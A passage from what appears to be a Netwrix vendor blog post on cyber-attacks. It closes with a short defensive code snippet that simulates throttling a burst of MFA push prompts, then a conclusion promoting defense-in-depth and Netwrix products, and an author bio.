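    for t in (1000, 1030, 1060, 1100):                  # constructed burst from one source
        print(t, throttle.request_prompt("carol", t, "198.51.100.9"))
    print(throttle.alerts)
```

Pair the fallback with a user-facing message that explains why the push stopped; a user who has just declined three prompts they did not initiate is exactly the person who should be told to change their password.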

Conclusion

So, what is the most common cyber-attack? There is no enduring answer to this question, since attack methods fall in and out of popularity. Accordingly, the best strategy for every organization is to adopt a defense-in-depth approach that covers all the functions of the NIST Cybersecurity Framework.

The good news is that the Netwrix suite of solutions does all of this. It empowers you to:

  • Easily discover and accurately classify your data, both on premises and in the cloud
  • Proactively identify and remediate security gaps before attackers exploit them
  • Replace risky standing privileged accounts with ephemeral accounts that have just enough access to perform the task at hand
  • Enforce least privilege access for all systems and data repositories
  • Continuously audit and analyze activity for anomalous behaviors
  • Get real-time alerts and even set up automated responses for known threats
  • Quickly investigate security incidents and determine the most effective response
  • Recover more quickly from cyberattacks and other incidents

Plus, Netwrix solutions integrate smoothly with many other security tools to streamline processes and enhance cybersecurity.

Ian has over two decades of IT experience, with a focus on data and access governance. As VP of Pre Sales Engineering at Netwrix, he is responsible for ensuring smooth product deployment and identity management integration for customers worldwide. His long career has positioned him to serve the needs of organizations of all sizes, with positions that include running the security architecture team for a Fortune 100 US financial institution and providing security solutions to small and medium businesses.